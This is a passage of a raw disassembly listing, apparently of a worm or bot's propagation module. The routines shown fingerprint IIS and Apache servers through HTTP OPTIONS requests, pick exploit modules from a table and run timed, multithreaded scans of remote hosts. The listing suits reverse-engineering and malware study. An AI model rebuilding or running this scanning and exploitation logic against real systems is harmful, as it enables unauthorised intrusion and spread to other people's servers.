; sub_40DC48+38�j
push esi
loc_40DCAA: ; CODE XREF: sub_40DC48+2E�j
call sub_403D49
pop ecx
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_40DC48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DCB8 proc near ; DATA XREF: sub_40DD96+83�o
var_1B0 = dword ptr -1B0h
var_1AC = byte ptr -1ACh
var_1A6 = byte ptr -1A6h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push edi
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_1B0]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
lea eax, [ebp+var_1AC]
push 1
push eax
call sub_4035FB
mov edi, eax
add esp, 18h
test edi, edi
jnz short loc_40DD08
push [ebp+var_1B0]
call sub_406753
pop ecx
xor eax, eax
jmp loc_40DD91
; ---------------------------------------------------------------------------
loc_40DD08: ; CODE XREF: sub_40DCB8+3B�j
lea eax, [ebp+var_1AC]
push esi
push eax
mov eax, [ebp+var_1B0]
push dword ptr [eax]
lea eax, [ebp+var_1A6]
push offset dword_41670C
push eax
call sub_408D50
lea eax, [ebp+var_1AC]
push eax
push offset dword_418854
call sub_410820 ; _mbscpy
add esp, 18h
loc_40DD3D: ; CODE XREF: sub_40DCB8+A3�j
; sub_40DCB8+B8�j ...
mov eax, [ebp+var_1B0]
cmp dword ptr [eax+4], 0
jnz short loc_40DD7B
push 3E8h
push edi
call sub_40371E
mov esi, eax
pop ecx
cmp esi, 0FFFFFFFFh
pop ecx
jz short loc_40DD3D
test esi, esi
jz short loc_40DD7B
push esi
push offset sub_40DC48
call sub_406541
pop ecx
test eax, eax
pop ecx
jnz short loc_40DD3D
push esi
call sub_403D49
pop ecx
jmp short loc_40DD3D
; ---------------------------------------------------------------------------
loc_40DD7B: ; CODE XREF: sub_40DCB8+8F�j
; sub_40DCB8+A7�j
push edi
call sub_4038E1
push [ebp+var_1B0]
call sub_406753
pop ecx
xor eax, eax
pop ecx
pop esi
loc_40DD91: ; CODE XREF: sub_40DCB8+4B�j
pop edi
leave
retn 4
sub_40DCB8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DD96 proc near ; CODE XREF: sub_40735A+71F�p
; sub_40E18A+1FB�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push 1ADh
call sub_41082C ; malloc
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short locret_40DE29
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
mov esi, 0FFFFh
mov ebx, 401h
jz short loc_40DDC9
push [ebp+arg_4]
call sub_41088C ; atoi
jmp short loc_40DDD1
; ---------------------------------------------------------------------------
loc_40DDC9: ; CODE XREF: sub_40DD96+27�j
push esi
push ebx
call sub_40AADE
pop ecx
loc_40DDD1: ; CODE XREF: sub_40DD96+31�j
mov edi, eax
pop ecx
test edi, edi
jz short loc_40DDDC
cmp edi, esi
jbe short loc_40DDE7
loc_40DDDC: ; CODE XREF: sub_40DD96+40�j
push esi
push ebx
call sub_40AADE
pop ecx
mov edi, eax
pop ecx
loc_40DDE7: ; CODE XREF: sub_40DD96+44�j
mov esi, [ebp+var_4]
push 0Ah
lea eax, [esi+4]
push eax
push edi
call sub_410C9A ; _itoa
mov ebx, [ebp+arg_0]
lea eax, [esi+0Ah]
push ebx
push eax
call sub_403E60
xor eax, eax
add esp, 14h
cmp [ebx+18Bh], al
push edi
push offset dword_416744
setz al
push eax
push esi
push offset sub_40DCB8
call sub_40663C
add esp, 14h
pop edi
pop esi
pop ebx
locret_40DE29: ; CODE XREF: sub_40DD96+14�j
leave
retn
sub_40DD96 endp
; =============== S U B R O U T I N E =======================================
sub_40DE2B proc near ; CODE XREF: seg000:00410616�p
push ebx
xor ebx, ebx
cmp off_416796, ebx
jz short loc_40DE7B
push esi
mov esi, offset off_416796
loc_40DE3C: ; CODE XREF: sub_40DE2B+4D�j
mov eax, [esi-8]
and eax, 0FFh
sub [esi], eax
and dword ptr [esi-4], 0
loc_40DE4A: ; CODE XREF: sub_40DE2B+29�j
; sub_40DE2B+3E�j
call sub_40AB05
test eax, eax
mov [esi-8], eax
jz short loc_40DE4A
xor edx, edx
mov ecx, offset word_41678E
loc_40DE5D: ; CODE XREF: sub_40DE2B+44�j
cmp dword ptr [ecx+8], 0
jz short loc_40DE71
cmp ebx, edx
jz short loc_40DE6B
cmp eax, [ecx]
jz short loc_40DE4A
loc_40DE6B: ; CODE XREF: sub_40DE2B+3A�j
inc edx
add ecx, 3Ah
jmp short loc_40DE5D
; ---------------------------------------------------------------------------
loc_40DE71: ; CODE XREF: sub_40DE2B+36�j
add esi, 3Ah
inc ebx
cmp dword ptr [esi], 0
jnz short loc_40DE3C
pop esi
loc_40DE7B: ; CODE XREF: sub_40DE2B+9�j
pop ebx
retn
sub_40DE2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DE7D proc near ; CODE XREF: sub_40E03D+6A�p
var_808 = byte ptr -808h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 808h
push ebx
push esi
push edi
push 16h
push offset aOptionsHttp1_0 ; "OPTIONS / HTTP/1.0\r\n\r\n"
push [ebp+arg_0]
call sub_403D54
push 0EA60h
push [ebp+arg_0]
call sub_403DD6
add esp, 14h
test eax, eax
jz loc_40E036
xor ebx, ebx
mov esi, 800h
push ebx
lea eax, [ebp+var_808]
push esi
push eax
push [ebp+arg_0]
call ds:dword_411258 ; recv
cmp eax, ebx
jz loc_40E036
cmp eax, 0FFFFFFFFh
jz loc_40E036
cmp eax, esi
jz loc_40E036
mov [ebp+eax+var_808], bl
lea eax, [ebp+var_808]
push offset aServer ; "Server:"
push eax
mov [ebp+var_8], ebx
call sub_410898 ; strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_40E036
lea ecx, [ebp+var_8]
mov esi, offset dword_412F18
push ecx
push esi
push eax
call sub_405733
add esp, 0Ch
test eax, eax
jz loc_40E036
lea eax, [ebp+var_8]
push eax
push esi
push ebx
call sub_405733
mov edi, eax
add esp, 0Ch
cmp edi, ebx
jz loc_40E036
lea eax, [ebp+var_8]
push eax
push esi
push ebx
call sub_405733
push 0Dh
push offset aMicrosoftIis ; "Microsoft-IIS"
push edi
mov [ebp+arg_0], eax
call sub_410CA0 ; _strnicmp
add esp, 18h
test eax, eax
jnz short loc_40DFBF
lea eax, [ebp+arg_0]
mov [ebp+var_4], ebx
push eax
lea eax, [ebp+var_4]
push eax
push offset aMicrosoftIisU_ ; "Microsoft-IIS/%u.%u"
push edi
mov [ebp+arg_0], ebx
call sub_410892 ; sscanf
add esp, 10h
push 4
pop eax
cmp [ebp+var_4], eax
jnz short loc_40DF8E
cmp [ebp+arg_0], ebx
jnz loc_40E036
jmp loc_40E038
; ---------------------------------------------------------------------------
loc_40DF8E: ; CODE XREF: sub_40DE7D+101�j
cmp [ebp+var_4], 5
jnz short loc_40DFAB
cmp [ebp+arg_0], ebx
jnz short loc_40DF9D
push 3
jmp short loc_40DFBC
; ---------------------------------------------------------------------------
loc_40DF9D: ; CODE XREF: sub_40DE7D+11A�j
cmp [ebp+arg_0], 5
jnz loc_40E036
push 2
jmp short loc_40DFBC
; ---------------------------------------------------------------------------
loc_40DFAB: ; CODE XREF: sub_40DE7D+115�j
cmp [ebp+var_4], 6
jnz loc_40E036
cmp [ebp+arg_0], ebx
jnz short loc_40E036
push 1
loc_40DFBC: ; CODE XREF: sub_40DE7D+11E�j
; sub_40DE7D+12C�j
pop eax
jmp short loc_40E038
; ---------------------------------------------------------------------------
loc_40DFBF: ; CODE XREF: sub_40DE7D+DD�j
cmp [ebp+arg_0], ebx
jz short loc_40E036
push 6
push offset aApache ; "Apache"
push edi
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40E036
lea eax, [ebp+var_4]
mov [ebp+var_4], ebx
push eax
push offset dword_416AE0
push edi
call sub_410892 ; sscanf
push 6
push offset dword_416AD8
push [ebp+arg_0]
call sub_410CA0 ; _strnicmp
mov esi, eax
add esp, 18h
neg esi
sbb esi, esi
inc esi
cmp esi, 1
jnz short loc_40E01E
push 7
push offset dword_416AD0
push [ebp+arg_0]
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40E036
loc_40E01E: ; CODE XREF: sub_40DE7D+189�j
cmp [ebp+var_4], 1
jz short loc_40E02A
cmp [ebp+var_4], 2
jnz short loc_40E036
loc_40E02A: ; CODE XREF: sub_40DE7D+1A5�j
xor eax, eax
cmp esi, ebx
setnz al
add eax, 5
jmp short loc_40E038
; ---------------------------------------------------------------------------
loc_40E036: ; CODE XREF: sub_40DE7D+2D�j
; sub_40DE7D+4E�j ...
xor eax, eax
loc_40E038: ; CODE XREF: sub_40DE7D+10C�j
; sub_40DE7D+140�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40DE7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E03D proc near ; DATA XREF: sub_40E18A+3B3�o
; sub_40E7C8+1C2�o
var_14C = dword ptr -14Ch
var_11A = dword ptr -11Ah
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = byte ptr -10Ah
var_8A = dword ptr -8Ah
var_86 = byte ptr -86h
var_6 = byte ptr -6
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
push 14Ch
lea eax, [ebp+var_14C]
push [ebp+arg_0]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
push 1
push [ebp+var_10E]
call sub_403402
lea eax, [ebp+var_10A]
push eax
push [ebp+var_10E]
call sub_403495
add esp, 20h
test eax, eax
jnz short loc_40E098
push [ebp+var_10E]
call sub_403D27
jmp loc_40E183
; ---------------------------------------------------------------------------
loc_40E098: ; CODE XREF: sub_40E03D+49�j
cmp [ebp+var_112], 0
jz short loc_40E0B9
push [ebp+var_10E]
call sub_40DE7D
cmp [ebp+var_112], eax
pop ecx
jnz loc_40E178
loc_40E0B9: ; CODE XREF: sub_40E03D+62�j
cmp [ebp+var_8A], 1
jnz short loc_40E0D3
lea eax, [ebp+var_6]
push eax
push [ebp+var_10E]
call sub_4034E7
jmp short loc_40E120
; ---------------------------------------------------------------------------
loc_40E0D3: ; CODE XREF: sub_40E03D+83�j
cmp [ebp+var_8A], 2
jnz short loc_40E111
lea eax, [ebp+var_6]
push 0Ah
push eax
push 0FFFFh
push 401h
call sub_40AADE
pop ecx
pop ecx
push eax
call sub_410C9A ; _itoa
lea eax, [ebp+var_10A]
push eax
lea eax, [ebp+var_86]
push eax
call sub_410820 ; _mbscpy
add esp, 14h
jmp short loc_40E134
; ---------------------------------------------------------------------------
loc_40E111: ; CODE XREF: sub_40E03D+9D�j
call sub_40DC42
push eax
lea eax, [ebp+var_6]
push eax
call sub_410820 ; _mbscpy
loc_40E120: ; CODE XREF: sub_40E03D+94�j
lea eax, [ebp+var_86]
push offset dword_418C78
push eax
call sub_410820 ; _mbscpy
add esp, 10h
loc_40E134: ; CODE XREF: sub_40E03D+D2�j
lea eax, [ebp+var_14C]
push eax
call [ebp+var_11A]
cmp [ebp+var_8A], 1
jnz short loc_40E15D
push [ebp+var_10E]
push [ebp+var_14C]
call sub_40DA6E
jmp short loc_40E176
; ---------------------------------------------------------------------------
loc_40E15D: ; CODE XREF: sub_40E03D+10B�j
cmp [ebp+var_8A], 2
jnz short loc_40E178
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_86]
push eax
call sub_40DB90
loc_40E176: ; CODE XREF: sub_40E03D+11E�j
pop ecx
pop ecx
loc_40E178: ; CODE XREF: sub_40E03D+76�j
; sub_40E03D+127�j
push [ebp+var_10E]
call sub_403D49
loc_40E183: ; CODE XREF: sub_40E03D+56�j
pop ecx
xor eax, eax
leave
retn 4
sub_40E03D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E18A proc near ; DATA XREF: sub_40E629+18D�o
var_758 = qword ptr -758h
var_740 = byte ptr -740h
var_640 = byte ptr -640h
var_63F = byte ptr -63Fh
var_540 = byte ptr -540h
var_53F = byte ptr -53Fh
var_440 = dword ptr -440h
var_43C = byte ptr -43Ch
var_429 = byte ptr -429h
var_37E = dword ptr -37Eh
var_2F4 = dword ptr -2F4h
var_2F0 = byte ptr -2F0h
var_1E8 = byte ptr -1E8h
var_1DA = dword ptr -1DAh
var_1D6 = dword ptr -1D6h
var_1D2 = dword ptr -1D2h
var_1CE = byte ptr -1CEh
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_43 = byte ptr -43h
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_28 = byte ptr -28h
var_14 = qword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 740h
push esi
push edi
push 2C9h
lea eax, [ebp+var_2F4]
push [ebp+arg_0]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
lea eax, [ebp+var_1E8]
push eax
call sub_4052D4
add esp, 14h
test al, al
jz short loc_40E1DF
push 14Ch
lea eax, [ebp+var_440]
push 0
push eax
call sub_410850 ; memset
add esp, 0Ch
jmp loc_40E269
; ---------------------------------------------------------------------------
loc_40E1DF: ; CODE XREF: sub_40E18A+38�j
xor esi, esi
mov edi, offset dword_416768
loc_40E1E6: ; CODE XREF: sub_40E18A+8A�j
lea eax, [ebp+var_28]
push edi
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_28]
push eax
call sub_40AC4E
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_28]
push eax
call sub_410C94 ; _strcmpi
add esp, 14h
test eax, eax
jz short loc_40E216
inc esi
add edi, 3Ah
jmp short loc_40E1E6
; ---------------------------------------------------------------------------
loc_40E216: ; CODE XREF: sub_40E18A+84�j
imul esi, 3Ah
push 3Ah
lea eax, [ebp+var_43C]
lea esi, dword_416768[esi]
push esi
push eax
mov [ebp+var_440], esi
call sub_410838 ; memcpy
lea eax, [ebp+var_43C]
push eax
call sub_40AC4E
lea eax, [ebp+var_429]
push eax
call sub_40AC4E
and [ebp+var_37E], 0
lea eax, [ebp+var_429]
push eax
lea eax, [ebp+var_1E8]
push eax
call sub_410820 ; _mbscpy
add esp, 1Ch
loc_40E269: ; CODE XREF: sub_40E18A+50�j
lea eax, [ebp+var_2F0]
push eax
call sub_405670
test eax, eax
pop ecx
jz short loc_40E2E0
mov dl, byte_417B60
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_53F]
mov [ebp+var_540], dl
rep stosd
stosw
stosb
push 3Fh
xor eax, eax
pop ecx
lea edi, [ebp+var_63F]
mov [ebp+var_640], dl
rep stosd
stosw
stosb
lea eax, [ebp+var_640]
push eax
lea eax, [ebp+var_2F0]
push eax
lea eax, [ebp+var_540]
push eax
call sub_405580
add esp, 0Ch
test eax, eax
jz short loc_40E2E0
push [ebp+var_1D2]
call sub_403925
test eax, eax
pop ecx
mov [ebp+var_4], eax
jnz short loc_40E2F3
loc_40E2E0: ; CODE XREF: sub_40E18A+EE�j
; sub_40E18A+141�j
push [ebp+var_2F4]
call sub_406753
pop ecx
xor eax, eax
jmp loc_40E623
; ---------------------------------------------------------------------------
loc_40E2F3: ; CODE XREF: sub_40E18A+154�j
mov eax, [ebp+var_440]
push ebx
test eax, eax
jz loc_40E395
test byte ptr [eax+32h], 1
jz loc_40E395
call sub_4032EF
mov ecx, eax
push 2
neg ecx
sbb ecx, ecx
pop edx
add ecx, 3
cmp [ebp+var_37], 0
mov [ebp+var_37E], ecx
jz short loc_40E33D
mov esi, [ebp+var_440]
test [esi+32h], dl
jnz short loc_40E33D
push 1
pop ecx
mov [ebp+var_37E], ecx
loc_40E33D: ; CODE XREF: sub_40E18A+19D�j
; sub_40E18A+1A8�j
cmp [ebp+var_47], 0
jz short loc_40E34B
mov ecx, edx
mov [ebp+var_37E], ecx
loc_40E34B: ; CODE XREF: sub_40E18A+1B7�j
cmp [ebp+var_46], 0
jz short loc_40E35A
push 3
pop ecx
mov [ebp+var_37E], ecx
loc_40E35A: ; CODE XREF: sub_40E18A+1C5�j
cmp ecx, 3
jnz short loc_40E395
test eax, eax
jz short loc_40E36B
mov [ebp+var_37E], edx
jmp short loc_40E395
; ---------------------------------------------------------------------------
loc_40E36B: ; CODE XREF: sub_40E18A+1D7�j
mov al, [ebp+var_43]
mov bl, [ebp+var_36]
and [ebp+var_43], 0
mov byte ptr [ebp+arg_0+3], al
lea eax, [ebp+var_1CE]
push 0
push eax
mov [ebp+var_36], 1
call sub_40DD96
mov al, byte ptr [ebp+arg_0+3]
pop ecx
pop ecx
mov [ebp+var_36], bl
mov [ebp+var_43], al
loc_40E395: ; CODE XREF: sub_40E18A+172�j
; sub_40E18A+17C�j ...
mov esi, offset dword_418008
push esi
call sub_406AE4
pop ecx
lea eax, [ebp+var_1E8]
push [ebp+var_1DA]
push eax
lea eax, [ebp+var_2F0]
push eax
mov eax, [ebp+var_2F4]
add eax, 14h
push offset dword_416BC8
push eax
call sub_410844 ; sprintf
push esi
call sub_406AEF
add esp, 18h
lea eax, [ebp+var_1E8]
push [ebp+var_1DA]
push eax
lea eax, [ebp+var_2F0]
push eax
mov eax, [ebp+var_2F4]
push dword ptr [eax]
lea eax, [ebp+var_1CE]
push offset dword_416B90
push eax
call sub_408D50
xor ebx, ebx
add esp, 18h
cmp [ebp+var_440], ebx
mov esi, 3E8h
jnz short loc_40E418
push esi
call ds:dword_4110A4 ; Sleep
loc_40E418: ; CODE XREF: sub_40E18A+285�j
mov [ebp+var_8], ebx
call sub_41084A ; clock
mov [ebp+var_C], eax
mov [ebp+arg_0], ebx
loc_40E426: ; CODE XREF: sub_40E18A+30F�j
; sub_40E18A+34C�j ...
mov eax, [ebp+var_2F4]
cmp [eax+4], ebx
jnz loc_40E5CC
mov edi, [ebp+arg_0]
sub edi, [ebp+var_C]
call sub_41084A ; clock
mov ecx, [ebp+var_1DA]
add eax, edi
imul ecx, 3E8h
cmp eax, ecx
jnb loc_40E5CC
lea eax, [ebp+var_640]
push eax
lea eax, [ebp+var_540]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_640]
push eax
lea eax, [ebp+var_2F0]
push eax
lea eax, [ebp+var_540]
push eax
call sub_405580
lea eax, [ebp+var_540]
push offset dword_418C78
push eax
call sub_410AEE ; strcmp
add esp, 1Ch
test eax, eax
jz short loc_40E426
push [ebp+var_4]
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_540]
push eax
call sub_403AFB
add esp, 0Ch
push eax
call sub_40394D
pop ecx
test eax, eax
pop ecx
jz short loc_40E4DC
call sub_41084A ; clock
mov ecx, [ebp+var_1DA]
add eax, edi
imul ecx, 3E8h
cmp eax, ecx
jb loc_40E426
loc_40E4DC: ; CODE XREF: sub_40E18A+335�j
push [ebp+var_1D6]
call ds:dword_4110A4 ; Sleep
push [ebp+var_4]
call sub_4039D2
test eax, eax
pop ecx
jz loc_40E5BC
loc_40E4F9: ; CODE XREF: sub_40E18A+39F�j
; sub_40E18A+3DA�j ...
push [ebp+var_4]
call sub_403A6C
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_40E5BC
inc [ebp+var_8]
cmp [ebp+var_440], 0
jz short loc_40E566
mov edi, 14Ch
push edi
call sub_41082C ; malloc
test eax, eax
pop ecx
mov dword ptr [ebp+var_14+4], eax
jz short loc_40E4F9
lea ecx, [ebp+var_440]
push edi
push ecx
push eax
call sub_410838 ; memcpy
mov edi, dword ptr [ebp+var_14+4]
push edi
push offset sub_40E03D
mov [edi+3Eh], ebx
call sub_406541
add esp, 14h
test eax, eax
jnz short loc_40E559
push edi
call sub_410832 ; free
jmp short loc_40E563
; ---------------------------------------------------------------------------
loc_40E559: ; CODE XREF: sub_40E18A+3C5�j
push [ebp+var_4]
push ebx
call sub_40397D
pop ecx
loc_40E563: ; CODE XREF: sub_40E18A+3CD�j
pop ecx
jmp short loc_40E4F9
; ---------------------------------------------------------------------------
loc_40E566: ; CODE XREF: sub_40E18A+38C�j
mov eax, [ebp+var_2F4]
cmp dword ptr [eax+4], 0
jnz short loc_40E5BC
lea eax, [ebp+var_740]
push eax
push ebx
call sub_403495
pop ecx
mov bl, [ebp+var_36]
pop ecx
lea eax, [ebp+var_1E8]
and [ebp+var_36], 0
push eax
lea eax, [ebp+var_740]
push eax
lea eax, [ebp+var_1CE]
push offset dword_416B7C
push eax
call sub_408D50
add esp, 10h
mov [ebp+var_36], bl
push esi
call ds:dword_4110A4 ; Sleep
add [ebp+arg_0], esi
jmp loc_40E4F9
; ---------------------------------------------------------------------------
loc_40E5BC: ; CODE XREF: sub_40E18A+369�j
; sub_40E18A+37C�j ...
push [ebp+var_4]
call sub_403AAE
pop ecx
xor ebx, ebx
jmp loc_40E426
; ---------------------------------------------------------------------------
loc_40E5CC: ; CODE XREF: sub_40E18A+2A5�j
; sub_40E18A+2C6�j
push [ebp+var_8]
call sub_41084A ; clock
sub eax, [ebp+var_C]
mov dword ptr [ebp+var_14+4], ebx
push ecx
push ecx
mov dword ptr [ebp+var_14], eax
lea eax, [ebp+var_1E8]
fild [ebp+var_14]
fmul ds:flt_411280
fstp [esp+758h+var_758]
push eax
lea eax, [ebp+var_2F0]
push eax
lea eax, [ebp+var_1CE]
push offset unk_416B38
push eax
call sub_408D50
push [ebp+var_4]
call sub_403AE6
push [ebp+var_2F4]
call sub_406753
add esp, 24h
xor eax, eax
pop ebx
loc_40E623: ; CODE XREF: sub_40E18A+164�j
pop edi
pop esi
leave
retn 4
sub_40E18A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E629 proc near ; CODE XREF: sub_40735A+107E�p
var_18 = byte ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
push esi
push edi
jz loc_40E7C3
mov edi, [ebp+arg_8]
cmp edi, ebx
jz loc_40E7C3
push edi
call sub_4052D4
test al, al
pop ecx
jz short loc_40E67A
push edi
call sub_40325E
test eax, eax
pop ecx
jz loc_40E7C3
loc_40E662: ; CODE XREF: sub_40E629+87�j
cmp [ebp+arg_C], ebx
mov esi, 15180h
jz short loc_40E6C1
push [ebp+arg_C]
call sub_41088C ; atoi
pop ecx
mov [ebp+var_4], eax
jmp short loc_40E6C4
; ---------------------------------------------------------------------------
loc_40E67A: ; CODE XREF: sub_40E629+28�j
cmp byte ptr dword_416768, 0
jz loc_40E7C3
mov eax, offset dword_416768
mov esi, eax
loc_40E68E: ; CODE XREF: sub_40E629+91�j
push eax
lea eax, [ebp+var_18]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_18]
push eax
call sub_40AC4E
lea eax, [ebp+var_18]
push edi
push eax
call sub_410C94 ; _strcmpi
add esp, 14h
test eax, eax
jz short loc_40E662
add esi, 3Ah
mov eax, esi
cmp byte ptr [esi], 0
jnz short loc_40E68E
jmp loc_40E7C3
; ---------------------------------------------------------------------------
loc_40E6C1: ; CODE XREF: sub_40E629+41�j
mov [ebp+var_4], esi
loc_40E6C4: ; CODE XREF: sub_40E629+4F�j
cmp [ebp+var_4], ebx
jz short loc_40E6CE
cmp [ebp+var_4], esi
jbe short loc_40E6D1
loc_40E6CE: ; CODE XREF: sub_40E629+9E�j
mov [ebp+var_4], esi
loc_40E6D1: ; CODE XREF: sub_40E629+A3�j
cmp [ebp+arg_10], ebx
mov esi, 7D0h
jz short loc_40E6E9
push [ebp+arg_10]
call sub_41088C ; atoi
pop ecx
mov [ebp+arg_10], eax
jmp short loc_40E6EC
; ---------------------------------------------------------------------------
loc_40E6E9: ; CODE XREF: sub_40E629+B0�j
mov [ebp+arg_10], esi
loc_40E6EC: ; CODE XREF: sub_40E629+BE�j
cmp [ebp+arg_10], 32h
jb short loc_40E6FB
cmp [ebp+arg_10], 0EA60h
jbe short loc_40E6FE
loc_40E6FB: ; CODE XREF: sub_40E629+C7�j
mov [ebp+arg_10], esi
loc_40E6FE: ; CODE XREF: sub_40E629+D0�j
cmp [ebp+arg_14], ebx
mov esi, 100h
jz short loc_40E716
push [ebp+arg_14]
call sub_41088C ; atoi
pop ecx
mov [ebp+arg_C], eax
jmp short loc_40E719
; ---------------------------------------------------------------------------
loc_40E716: ; CODE XREF: sub_40E629+DD�j
mov [ebp+arg_C], esi
loc_40E719: ; CODE XREF: sub_40E629+EB�j
cmp [ebp+arg_C], ebx
jz short loc_40E727
cmp [ebp+arg_C], 200h
jbe short loc_40E72A
loc_40E727: ; CODE XREF: sub_40E629+F3�j
mov [ebp+arg_C], esi
loc_40E72A: ; CODE XREF: sub_40E629+FC�j
push 2C9h
call sub_41082C ; malloc
mov esi, eax
pop ecx
cmp esi, ebx
jz loc_40E7C3
push 108h
lea edi, [esi+4]
push [ebp+arg_4]
push edi
call sub_4052A6
push 0Eh
lea ebx, [esi+10Ch]
push [ebp+arg_8]
push ebx
call sub_4052A6
mov eax, [ebp+var_4]
push 1A3h
push [ebp+arg_0]
mov [esi+11Ah], eax
mov eax, [ebp+arg_10]
mov [esi+11Eh], eax
mov eax, [ebp+arg_C]
mov [esi+122h], eax
lea eax, [esi+126h]
push eax
call sub_410838 ; memcpy
mov ecx, [ebp+arg_0]
add esp, 24h
xor eax, eax
push [ebp+arg_C]
cmp [ecx+18Bh], al
push [ebp+arg_10]
setz al
push dword ptr [esi+11Ah]
push ebx
push edi
push offset unk_416BF4
push eax
push esi
push offset sub_40E18A
call sub_40663C
add esp, 24h
loc_40E7C3: ; CODE XREF: sub_40E629+E�j
; sub_40E629+19�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40E629 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E7C8 proc near ; DATA XREF: sub_40EA34+4B�o
var_488 = dword ptr -488h
var_484 = byte ptr -484h
var_304 = byte ptr -304h
var_17D = byte ptr -17Dh
var_17C = byte ptr -17Ch
var_179 = byte ptr -179h
var_16D = byte ptr -16Dh
var_16C = byte ptr -16Ch
var_16B = byte ptr -16Bh
var_160 = dword ptr -160h
var_15C = byte ptr -15Ch
var_149 = byte ptr -149h
var_9E = dword ptr -9Eh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 488h
push ebx
push esi
push edi
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_488]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
mov eax, [ebp+var_488]
add esp, 10h
push dword ptr [eax]
lea eax, [ebp+var_304]
push offset unk_416CA0
push eax
call sub_408D50
lea eax, [ebp+var_14]
xor edi, edi
push eax
lea eax, [ebp+var_484]
push offset dword_412F18
push eax
mov [ebp+var_C], edi
mov [ebp+var_8], edi
call sub_405733
add esp, 18h
mov [ebp+var_10], eax
loc_40E82F: ; CODE XREF: sub_40E7C8+236�j
inc [ebp+var_C]
cmp off_416796, edi
jz loc_40E9DC
mov [ebp+var_4], offset dword_416768
loc_40E845: ; CODE XREF: sub_40E7C8+20E�j
mov esi, [ebp+var_4]
push 3Ah
lea eax, [ebp+var_15C]
push esi
push eax
call sub_410838 ; memcpy
lea eax, [ebp+var_15C]
mov [ebp+var_160], esi
push eax
call sub_40AC4E
lea eax, [ebp+var_149]
push eax
call sub_40AC4E
mov eax, [ebp+var_160]
add esp, 14h
cmp eax, edi
jz loc_40E936
test byte ptr [eax+32h], 1
jz loc_40E936
call sub_4032EF
mov ecx, eax
neg ecx
sbb ecx, ecx
add ecx, 3
cmp [ebp+var_16D], 0
mov [ebp+var_9E], ecx
jz short loc_40E8C2
mov edx, [ebp+var_160]
test byte ptr [edx+32h], 2
jnz short loc_40E8C2
push 1
pop ecx
mov [ebp+var_9E], ecx
loc_40E8C2: ; CODE XREF: sub_40E7C8+E3�j
; sub_40E7C8+EF�j
cmp [ebp+var_17D], 0
jz short loc_40E8D4
push 2
pop ecx
mov [ebp+var_9E], ecx
loc_40E8D4: ; CODE XREF: sub_40E7C8+101�j
cmp [ebp+var_17C], 0
jz short loc_40E8E6
push 3
pop ecx
mov [ebp+var_9E], ecx
loc_40E8E6: ; CODE XREF: sub_40E7C8+113�j
cmp ecx, 3
jnz short loc_40E936
cmp eax, edi
jz short loc_40E8FB
mov [ebp+var_9E], 2
jmp short loc_40E936
; ---------------------------------------------------------------------------
loc_40E8FB: ; CODE XREF: sub_40E7C8+125�j
mov al, [ebp+var_179]
mov bl, [ebp+var_16C]
and [ebp+var_179], 0
mov byte ptr [ebp+arg_0+3], al
lea eax, [ebp+var_304]
push edi
push eax
mov [ebp+var_16C], 1
call sub_40DD96
mov al, byte ptr [ebp+arg_0+3]
pop ecx
pop ecx
mov [ebp+var_16C], bl
mov [ebp+var_179], al
loc_40E936: ; CODE XREF: sub_40E7C8+B8�j
; sub_40E7C8+C2�j ...
mov cl, [ebp+var_16B]
mov eax, 1388h
neg cl
sbb ecx, ecx
and ecx, eax
add ecx, eax
lea eax, [ebp+var_149]
push ecx
push edi
push eax
push [ebp+var_10]
call sub_403BBB
mov ebx, eax
add esp, 10h
cmp ebx, edi
jz short loc_40E9CC
push 14Ch
call sub_41082C ; malloc
